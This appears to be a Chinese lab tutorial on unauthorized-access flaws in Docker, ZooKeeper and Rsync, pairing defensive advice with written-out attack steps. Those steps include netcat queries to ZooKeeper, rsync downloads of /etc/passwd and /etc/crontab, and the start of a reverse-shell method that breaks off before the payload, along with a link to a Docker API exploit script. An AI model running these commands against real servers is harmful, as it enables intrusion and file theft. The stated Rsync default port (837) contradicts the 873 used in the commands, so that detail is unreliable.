黑客最喜欢的常见未授权访问漏洞系( 五 ) _漏洞

Docker 未授权访问漏洞利用脚本[没试过]
https://github.com/Tycx2ry/docker_api_vul防御手段-简单粗暴的方法，对2375端口做网络访问控制，如ACL控制，或者访问规则。-修改docker swarm的认证方式，使用TLS认证：Overview Swarm with TLS 和 Configure Docker Swarm for TLS这两篇文档，说的是配置好TLS后，Docker CLI 在发送命令到docker daemon之前，会首先发送它的证书，如果证书是由daemon信任的CA所签名的，才可以继续执行。
ZooKeeper 未授权访问漏洞漏洞简介以及危害 zookeeper是分布式协同管理工具，常用来管理系统配置信息，提供分布式协同服务。Zookeeper的默认开放端口是2181 。Zookeeper安装部署之后默认情况下不需要任何身份验证，造成攻击者可以远程利用Zookeeper，通过服务器收集敏感信息或者在Zookeeper集群内进行破坏（比如：kill命令）。攻击者能够执行所有只允许由管理员运行的命令。
漏洞利用环境介绍目标靶机：Centosip地址：172.16.2.251连接工具：Xshell环境搭建#搭建环境wget https://mirrors.tuna.tsinghua.edu.cn/apache/zookeeper/zookeeper-3.4.14/zookeeper-3.4.14.tar.gztar -xzvf zookeeper-3.4.14.tar.gz cd zookeeper-3.4.14/confmv zoo_sample.cfg zoo.cfg../bin/zkServer.sh start # 启动

文章插图

未授权访问测试#获取该服务器的环境echo envi|nc 172.16.2.251 2181

文章插图

利用zookeeper可视化管理工具进行连接下载地址：https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip

文章插图

文章插图

防御手段-修改 ZooKeeper 默认端口，采用其他端口服务。-添加访问控制，配置服务来源地址限制策略。-增加 ZooKeeper 的认证配置。
Rsync 未授权访问漏洞漏洞简介以及危害 Rsync（remote synchronize）是一个远程数据同步工具，可通过 LAN/WAN 快速同步多台主机间的文件，也可以同步本地硬盘中的不同目录。Rsync 默认允许匿名访问，如果在配置文件中没有相关的用户认证以及文件授权，就会触发隐患。Rsync 的默认端口为 837 。
漏洞利用环境介绍目标靶机：Kaliip地址：172.16.2.250连接工具：Xshell环境搭建

#利用DownGit下载https://github.com/vulhub/vulhub/tree/master/rsync/commonDownGit网址：https://minhaskamal.github.io/DownGit/#/home

文章插图

# 上传文件到靶机并进行解压unzip common.zip

文章插图

# 编译并启动docker容器cd common/docker-compose build && docker-compose up -d

文章插图

未授权访问测试#rsync rsync://{target_ip}/rsync rsync://172.16.2.250:873/rsync rsync://172.16.2.250:873/src

文章插图

利用rsync下载任意文件rsync rsync://172.16.2.250:873/src/etc/passwd ./

文章插图

利用rsync反弹shell

# 下载crontab配置文件rsync rsync://172.16.2.250:873/src/etc/crontab ./该环境crontab中17 ** * *rootcd / && run-parts --report /etc/cron.hourly表示每小时的第17分钟执行run-parts --report /etc/cron.hourly